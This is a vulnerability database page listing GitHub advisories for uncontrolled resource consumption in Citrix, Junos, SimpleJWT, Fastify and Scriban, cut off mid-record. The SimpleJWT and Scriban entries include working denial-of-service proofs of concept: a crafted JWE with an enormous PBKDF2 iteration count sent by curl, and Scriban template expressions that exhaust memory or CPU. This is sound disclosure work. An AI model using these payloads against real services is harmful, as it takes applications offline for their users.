Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5401 vulnerabilities reference this CWE, most recent first.

GHSA-XVX2-HW78-H573

Vulnerability from github – Published: 2022-05-24 19:05 – Updated: 2022-05-24 19:05
VLAI
Details

Citrix ADC and Citrix/NetScaler Gateway 13.0 before 13.0-76.29, 12.1-61.18, 11.1-65.20, Citrix ADC 12.1-FIPS before 12.1-55.238, and Citrix SD-WAN WANOP Edition before 11.4.0, 11.3.2, 11.3.1a, 11.2.3a, 11.1.2c, 10.2.9a suffers from uncontrolled resource consumption by way of a network-based denial-of-service from within the same Layer 2 network segment. Note that the attacker must be in the same Layer 2 network segment as the vulnerable appliance.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-8299"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-16T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Citrix ADC and Citrix/NetScaler Gateway 13.0 before 13.0-76.29, 12.1-61.18, 11.1-65.20, Citrix ADC 12.1-FIPS before 12.1-55.238, and Citrix SD-WAN WANOP Edition before 11.4.0, 11.3.2, 11.3.1a, 11.2.3a, 11.1.2c, 10.2.9a suffers from uncontrolled resource consumption by way of a network-based denial-of-service from within the same Layer 2 network segment. Note that the attacker must be in the same Layer 2 network segment as the vulnerable appliance.",
  "id": "GHSA-xvx2-hw78-h573",
  "modified": "2022-05-24T19:05:30Z",
  "published": "2022-05-24T19:05:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8299"
    },
    {
      "type": "WEB",
      "url": "https://support.citrix.com/article/CTX297155"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XW36-22JX-J7VQ

Vulnerability from github – Published: 2022-05-24 19:08 – Updated: 2022-05-24 19:08
VLAI
Details

An uncontrolled resource consumption vulnerability in Juniper Networks Junos OS on QFX5000 Series and EX4600 Series switches allows an attacker sending large amounts of legitimate traffic destined to the device to cause Interchassis Control Protocol (ICCP) interruptions, leading to an unstable control connection between the Multi-Chassis Link Aggregation Group (MC-LAG) nodes which can in turn lead to traffic loss. Continued receipt of this amount of traffic will create a sustained Denial of Service (DoS) condition. An indication that the system could be impacted by this issue is the following log message: "DDOS_PROTOCOL_VIOLATION_SET: Warning: Host-bound traffic for protocol/exception LOCALNH:aggregate exceeded its allowed bandwidth at fpc for times, started at " This issue affects Juniper Networks Junos OS on QFX5000 Series and EX4600 Series: 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S7; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R1-S1, 20.4R2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-0285"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-15T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "An uncontrolled resource consumption vulnerability in Juniper Networks Junos OS on QFX5000 Series and EX4600 Series switches allows an attacker sending large amounts of legitimate traffic destined to the device to cause Interchassis Control Protocol (ICCP) interruptions, leading to an unstable control connection between the Multi-Chassis Link Aggregation Group (MC-LAG) nodes which can in turn lead to traffic loss. Continued receipt of this amount of traffic will create a sustained Denial of Service (DoS) condition. An indication that the system could be impacted by this issue is the following log message: \"DDOS_PROTOCOL_VIOLATION_SET: Warning: Host-bound traffic for protocol/exception LOCALNH:aggregate exceeded its allowed bandwidth at fpc \u003cfpc number\u003e for \u003cn\u003e times, started at \u003ctimestamp\u003e\" This issue affects Juniper Networks Junos OS on QFX5000 Series and EX4600 Series: 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S7; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R1-S1, 20.4R2.",
  "id": "GHSA-xw36-22jx-j7vq",
  "modified": "2022-05-24T19:08:07Z",
  "published": "2022-05-24T19:08:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-0285"
    },
    {
      "type": "WEB",
      "url": "https://kb.juniper.net/JSA11187"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XW36-67F8-339X

Vulnerability from github – Published: 2026-03-18 20:16 – Updated: 2026-03-25 18:12
VLAI
Summary
SimpleJWT has an Unauthenticated Denial of Service via JWE header tampering
Details

Summary

An unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.
Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected.

Details

PHP version: PHP 8.4.11 SimpleJWT version: v1.1.0

The relevant portion of the vulnerable implementation is shown below (PBES2.php):

<?php
/* ... SNIP ... */
class PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {
    use AESKeyWrapTrait;

    /** @var array<string, mixed> $alg_params */
    static protected $alg_params = [
        'PBES2-HS256+A128KW' => ['hash' => 'sha256'],
        'PBES2-HS384+A192KW' => ['hash' => 'sha384'],
        'PBES2-HS512+A256KW' => ['hash' => 'sha512']
    ];

    /** @var truthy-string $hash_alg */
    protected $hash_alg;

    /** @var int $iterations */
    protected $iterations = 4096;

    /* ... SNIP ... */

    /**
     * Sets the number of iterations to use in PBKFD2 key generation.
     *
     * @param int $iterations number of iterations
     * @return void
     */
    public function setIterations(int $iterations) {
        $this->iterations = $iterations;
    }

    /* ... SNIP ... */

    /**
     * {@inheritdoc}
     */
    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {
        /** @var SymmetricKey $key */
        $key = $this->selectKey($keys, $kid);
        if ($key == null) {
            throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);
        }
        if (!isset($headers['p2s']) || !isset($headers['p2c'])) {
            throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);
        }

        $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);
        return $this->unwrapKey($encrypted_key, $derived_key, $headers);
    }

    /* ... SNIP ... */

    /**
     * @param array<string, mixed> $headers
     */
    private function generateKeyFromPassword(string $password, array $headers): string {
        $salt = $headers['alg'] . "\x00" . Util::base64url_decode($headers['p2s']);
        /** @var int<0, max> $length */
        $length = intdiv($this->getAESKWKeySize(), 8);

        return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);
    }
}
?>

The security flaw lies in the lack of input validation when handling JWEs that uses PBES2.
A "sanity ceiling" is not set on the iteration count, which is the parameter known in the JWE specification as p2c (RFC7518).
The library calls decryptKey() with the untrusted input $headers which then use the PHP function hash_pbkdf2() with the user-supplied value $headers['p2c'].

This results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.
Because the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.

Proof of Concept

Spin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.

mkdir simplejwt-poc
cd simplejwt-poc
composer install
composer require kelvinmo/simplejwt
php -S localhost:8000

The content of index.php:

<?php

require __DIR__ . '/vendor/autoload.php';

$set = SimpleJWT\Keys\KeySet::createFromSecret('secret123');

$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$method = $_SERVER['REQUEST_METHOD'];

if ($uri === '/encrypt' && $method === 'GET') {
    // Note $headers['alg'] and $headers['enc'] are required
    $headers = ['alg' => 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];
    $plaintext = 'This is the plaintext I want to encrypt.';
    $jwe = new SimpleJWT\JWE($headers, $plaintext);

    try {
        echo "Encrypted JWE: " . $jwe->encrypt($set);
    } catch (\RuntimeException $e) {
        echo $e;
    }
}

elseif ($uri === '/decrypt' && $method === 'GET') {
    try {
        $jwe = $_GET['s'];
        $jwe = SimpleJWT\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');
    } catch (SimpleJWT\InvalidTokenException $e) {
        echo $e;
    }
    echo $jwe->getHeader('alg') . "<br>";
    echo $jwe->getHeader('enc') . "<br>";
    echo $jwe->getPlaintext() . "<br>";
    }

else {
    http_response_code(404);
    echo "Route not found";
}

?>

We have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):

{
    "alg": "PBES2-HS256+A128KW",
    "enc": "A128CBC-HS256",
    "p2s": "blablabla",
    "p2c": 409123223136
}

The final JWE with poisoned header: eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla.

Notice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.

Perform the following request to the server (which tries to derive the PBES2 key):

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: localhost:8000' \
    $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'

The request blocks the worker until the PHP execution timeout is reached, shutting down the server:

[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started
[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted

Fatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168

Impact

An attacker can send a crafted JWE with an extremely large p2c value to force the server to perform a very large number of PBKDF2 iterations.
This causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.
Repeated requests can exhaust server resources and make the application unavailable to legitimate users.

Credits

Edoardo Ottavianelli (@edoardottt)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "kelvinmo/simplejwt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33204"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T20:16:59Z",
    "nvd_published_at": "2026-03-20T23:16:45Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.  \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n\u003c?php\n/* ... SNIP ... */\nclass PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {\n    use AESKeyWrapTrait;\n\n    /** @var array\u003cstring, mixed\u003e $alg_params */\n    static protected $alg_params = [\n        \u0027PBES2-HS256+A128KW\u0027 =\u003e [\u0027hash\u0027 =\u003e \u0027sha256\u0027],\n        \u0027PBES2-HS384+A192KW\u0027 =\u003e [\u0027hash\u0027 =\u003e \u0027sha384\u0027],\n        \u0027PBES2-HS512+A256KW\u0027 =\u003e [\u0027hash\u0027 =\u003e \u0027sha512\u0027]\n    ];\n\n    /** @var truthy-string $hash_alg */\n    protected $hash_alg;\n\n    /** @var int $iterations */\n    protected $iterations = 4096;\n    \n    /* ... SNIP ... */\n\n    /**\n     * Sets the number of iterations to use in PBKFD2 key generation.\n     *\n     * @param int $iterations number of iterations\n     * @return void\n     */\n    public function setIterations(int $iterations) {\n        $this-\u003eiterations = $iterations;\n    }\n    \n    /* ... SNIP ... */\n\n    /**\n     * {@inheritdoc}\n     */\n    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n        /** @var SymmetricKey $key */\n        $key = $this-\u003eselectKey($keys, $kid);\n        if ($key == null) {\n            throw new CryptException(\u0027Key not found or is invalid\u0027, CryptException::KEY_NOT_FOUND_ERROR);\n        }\n        if (!isset($headers[\u0027p2s\u0027]) || !isset($headers[\u0027p2c\u0027])) {\n            throw new CryptException(\u0027p2s or p2c headers not set\u0027, CryptException::INVALID_DATA_ERROR);\n        }\n\n        $derived_key = $this-\u003egenerateKeyFromPassword($key-\u003etoBinary(), $headers);\n        return $this-\u003eunwrapKey($encrypted_key, $derived_key, $headers);\n    }\n    \n    /* ... SNIP ... */\n\n    /**\n     * @param array\u003cstring, mixed\u003e $headers\n     */\n    private function generateKeyFromPassword(string $password, array $headers): string {\n        $salt = $headers[\u0027alg\u0027] . \"\\x00\" . Util::base64url_decode($headers[\u0027p2s\u0027]);\n        /** @var int\u003c0, max\u003e $length */\n        $length = intdiv($this-\u003egetAESKWKeySize(), 8);\n\n        return hash_pbkdf2($this-\u003ehash_alg, $password, $salt, $headers[\u0027p2c\u0027], $length, true);\n    }\n}\n?\u003e\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that uses PBES2.  \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)).  \nThe library calls `decryptKey()` with the untrusted input `$headers` which then use the PHP function `hash_pbkdf2()` with the user-supplied value `$headers[\u0027p2c\u0027]`.\n\nThis results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.  \nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n\u003c?php\n\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n$set = SimpleJWT\\Keys\\KeySet::createFromSecret(\u0027secret123\u0027);\n\n$uri = parse_url($_SERVER[\u0027REQUEST_URI\u0027], PHP_URL_PATH);\n$method = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\nif ($uri === \u0027/encrypt\u0027 \u0026\u0026 $method === \u0027GET\u0027) {\n    // Note $headers[\u0027alg\u0027] and $headers[\u0027enc\u0027] are required\n    $headers = [\u0027alg\u0027 =\u003e \u0027PBES2-HS256+A128KW\u0027, \u0027enc\u0027 =\u003e \u0027A256CBC-HS512\u0027];\n    $plaintext = \u0027This is the plaintext I want to encrypt.\u0027;\n    $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n    try {\n        echo \"Encrypted JWE: \" . $jwe-\u003eencrypt($set);\n    } catch (\\RuntimeException $e) {\n        echo $e;\n    }\n}\n\nelseif ($uri === \u0027/decrypt\u0027 \u0026\u0026 $method === \u0027GET\u0027) {\n    try {\n        $jwe = $_GET[\u0027s\u0027];\n        $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, \u0027PBES2-HS256+A128KW\u0027);\n    } catch (SimpleJWT\\InvalidTokenException $e) {\n        echo $e;\n    }\n    echo $jwe-\u003egetHeader(\u0027alg\u0027) . \"\u003cbr\u003e\";\n    echo $jwe-\u003egetHeader(\u0027enc\u0027) . \"\u003cbr\u003e\";\n    echo $jwe-\u003egetPlaintext() . \"\u003cbr\u003e\";\n    }\n\nelse {\n    http_response_code(404);\n    echo \"Route not found\";\n}\n\n?\u003e\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n    \"alg\": \"PBES2-HS256+A128KW\",\n    \"enc\": \"A128CBC-HS256\",\n    \"p2s\": \"blablabla\",\n    \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $\u0027GET\u0027 \\\n    -H $\u0027Host: localhost:8000\u0027 \\\n    $\u0027http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla\u0027\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations.  \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.  \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)",
  "id": "GHSA-xw36-67f8-339x",
  "modified": "2026-03-25T18:12:39Z",
  "published": "2026-03-18T20:16:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33204"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kelvinmo/simplejwt"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SimpleJWT has an Unauthenticated Denial of Service via JWE header tampering"
}

GHSA-XW5P-HW6R-2J98

Vulnerability from github – Published: 2020-08-05 14:53 – Updated: 2020-08-03 21:25
VLAI
Summary
Denial of service in fastify
Details

A denial of service vulnerability exists in Fastify v2.14.1 and v3.0.0-rc.4 that allows a malicious user to trigger resource exhaustion (when the allErrors option is used) with specially crafted schemas.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fastify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.15.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-8192"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-03T21:25:40Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "A denial of service vulnerability exists in Fastify v2.14.1 and v3.0.0-rc.4 that allows a malicious user to trigger resource exhaustion (when the allErrors option is used) with specially crafted schemas.",
  "id": "GHSA-xw5p-hw6r-2j98",
  "modified": "2020-08-03T21:25:40Z",
  "published": "2020-08-05T14:53:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8192"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify/commit/74c3157ca90c3ffed9e4434f63c2017471ec970e"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/903521"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Denial of service in fastify"
}

GHSA-XW6W-9JJH-P9CR

Vulnerability from github – Published: 2026-03-24 22:16 – Updated: 2026-07-06 13:10
VLAI
Summary
Scriban has Multiple Denial-of-Service Vectors via Unbounded Resource Consumption During Expression Evaluation
Details

Summary

Scriban's expression evaluation contains three distinct code paths that allow an attacker who can supply a template to cause denial of service through unbounded memory allocation or CPU exhaustion. The existing safety controls (LimitToString, LoopLimit) do not protect these paths, giving applications a false sense of safety when evaluating untrusted templates.

Details

Vector 1: Unbounded string multiplication

In ScriptBinaryExpression.cs, the CalculateToString method handles the string * int operator by looping without any upper bound:

// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:319-334
var leftText = context.ObjectToString(left);
var builder = new StringBuilder();
for (int i = 0; i < value; i++)
{
    builder.Append(leftText);
}
return builder.ToString();

The LimitToString safety control (default 1MB) does not protect this code path. It only applies to ObjectToString output conversions in TemplateContext.Helpers.cs (lines 101-121), not to intermediate string values constructed inside CalculateToString. The LoopLimit also does not apply because this is a C# for loop, not a template-level loop — StepLoop() is never called here.

Vector 2: Unbounded BigInteger shift left

The CalculateLongWithInt and CalculateBigIntegerNoFit methods handle ShiftLeft without any bound on the shift amount:

// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:710-711
case ScriptBinaryOperator.ShiftLeft:
    return (BigInteger)left << (int)right;
// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:783-784
case ScriptBinaryOperator.ShiftLeft:
    return left << (int)right;

In contrast, the Power operator at lines 722 and 795 uses BigInteger.ModPow(left, right, MaxBigInteger) to cap results. The MaxBigInteger constant (BigInteger.One << 1024 * 1024, defined at line 690) already exists but is never applied to shift operations.

Vector 3: LoopLimit bypass via range enumeration in builtin functions

The range operators .. and ..< produce lazy IEnumerable<object> iterators:

// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:401-417
private static IEnumerable<object> RangeInclude(BigInteger left, BigInteger right)
{
    if (left < right)
    {
        for (var i = left; i <= right; i++)
        {
            yield return FitToBestInteger(i);
        }
    }
    // ...
}

When these ranges are consumed by builtin functions, LoopLimit is completely bypassed because StepLoop() is only called in ScriptForStatement and ScriptWhileStatement — it is never called in any function under src/Scriban/Functions/. For example:

  • ArrayFunctions.Size (line 609) calls .Cast<object>().Count(), fully enumerating the range
  • ArrayFunctions.Join (line 388) iterates with foreach and appends to a StringBuilder with no size limit

PoC

Vector 1 — String multiplication OOM:

var template = Template.Parse("{{ 'AAAA' * 500000000 }}");
var context = new TemplateContext();
// context.LimitToString is 1048576 by default — does NOT protect this path
template.Render(context); // OutOfMemoryException: attempts ~2GB allocation

Vector 2 — BigInteger shift OOM:

var template = Template.Parse("{{ 1 << 100000000 }}");
var context = new TemplateContext();
template.Render(context); // Allocates BigInteger with 100M bits (~12.5MB)
// {{ 1 << 2000000000 }} attempts ~250MB

Vector 3 — LoopLimit bypass via range + builtin:

var template = Template.Parse("{{ (0..1000000000) | array.size }}");
var context = new TemplateContext();
// context.LoopLimit is 1000 — does NOT protect builtin function iteration
template.Render(context); // CPU exhaustion: enumerates 1 billion items
var template = Template.Parse("{{ (0..10000000) | array.join ',' }}");
var context = new TemplateContext();
template.Render(context); // Memory exhaustion: builds ~80MB+ joined string

Impact

An attacker who can supply a Scriban template (common in CMS platforms, email templating systems, reporting tools, and other applications embedding Scriban) can cause denial of service by crashing the host process via OutOfMemoryException or exhausting CPU resources. This is particularly impactful because:

  1. Applications relying on the default safety controls (LoopLimit=1000, LimitToString=1MB) believe they are protected against resource exhaustion from untrusted templates, but these controls have gaps.
  2. A single malicious template expression is sufficient — no complex template logic is required.
  3. The OutOfMemoryException in vectors 1 and 2 typically terminates the entire process, not just the template evaluation.

Recommended Fix

Vector 1 — String multiplication: Check LimitToString before the loop

// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs, before line 330
var leftText = context.ObjectToString(left);
if (context.LimitToString > 0 && (long)value * leftText.Length > context.LimitToString)
{
    throw new ScriptRuntimeException(span,
        $"String multiplication would exceed LimitToString ({context.LimitToString} characters)");
}
var builder = new StringBuilder();
for (int i = 0; i < value; i++)

Vector 2 — BigInteger shift: Cap the shift amount

// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs, lines 710-711 and 783-784
case ScriptBinaryOperator.ShiftLeft:
    if (right > 1048576) // Same as MaxBigInteger bit count
        throw new ScriptRuntimeException(span,
            $"Shift amount {right} exceeds maximum allowed (1048576)");
    return (BigInteger)left << (int)right;

Vector 3 — Range + builtins: Add iteration counting to range iterators

Pass TemplateContext to RangeInclude/RangeExclude and enforce a limit:

private static IEnumerable<object> RangeInclude(TemplateContext context, BigInteger left, BigInteger right)
{
    var maxRange = context.LoopLimit > 0 ? context.LoopLimit : int.MaxValue;
    int count = 0;
    if (left < right)
    {
        for (var i = left; i <= right; i++)
        {
            if (++count > maxRange)
                throw new ScriptRuntimeException(context.CurrentNode.Span,
                    $"Range enumeration exceeds LoopLimit ({maxRange})");
            yield return FitToBestInteger(i);
        }
    }
    // ... same for descending branch
}

Alternatively, validate range size eagerly at creation time: if (BigInteger.Abs(right - left) > maxRange) throw ...

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Scriban"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Scriban.Signed"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T22:16:01Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nScriban\u0027s expression evaluation contains three distinct code paths that allow an attacker who can supply a template to cause denial of service through unbounded memory allocation or CPU exhaustion. The existing safety controls (`LimitToString`, `LoopLimit`) do not protect these paths, giving applications a false sense of safety when evaluating untrusted templates.\n\n## Details\n\n### Vector 1: Unbounded string multiplication\n\nIn `ScriptBinaryExpression.cs`, the `CalculateToString` method handles the `string * int` operator by looping without any upper bound:\n\n```csharp\n// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:319-334\nvar leftText = context.ObjectToString(left);\nvar builder = new StringBuilder();\nfor (int i = 0; i \u003c value; i++)\n{\n    builder.Append(leftText);\n}\nreturn builder.ToString();\n```\n\nThe `LimitToString` safety control (default 1MB) does **not** protect this code path. It only applies to `ObjectToString` output conversions in `TemplateContext.Helpers.cs` (lines 101-121), not to intermediate string values constructed inside `CalculateToString`. The `LoopLimit` also does not apply because this is a C# `for` loop, not a template-level loop \u2014 `StepLoop()` is never called here.\n\n### Vector 2: Unbounded BigInteger shift left\n\nThe `CalculateLongWithInt` and `CalculateBigIntegerNoFit` methods handle `ShiftLeft` without any bound on the shift amount:\n\n```csharp\n// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:710-711\ncase ScriptBinaryOperator.ShiftLeft:\n    return (BigInteger)left \u003c\u003c (int)right;\n```\n\n```csharp\n// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:783-784\ncase ScriptBinaryOperator.ShiftLeft:\n    return left \u003c\u003c (int)right;\n```\n\nIn contrast, the `Power` operator at lines 722 and 795 uses `BigInteger.ModPow(left, right, MaxBigInteger)` to cap results. The `MaxBigInteger` constant (`BigInteger.One \u003c\u003c 1024 * 1024`, defined at line 690) already exists but is never applied to shift operations.\n\n### Vector 3: LoopLimit bypass via range enumeration in builtin functions\n\nThe range operators `..` and `..\u003c` produce lazy `IEnumerable\u003cobject\u003e` iterators:\n\n```csharp\n// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs:401-417\nprivate static IEnumerable\u003cobject\u003e RangeInclude(BigInteger left, BigInteger right)\n{\n    if (left \u003c right)\n    {\n        for (var i = left; i \u003c= right; i++)\n        {\n            yield return FitToBestInteger(i);\n        }\n    }\n    // ...\n}\n```\n\nWhen these ranges are consumed by builtin functions, `LoopLimit` is completely bypassed because 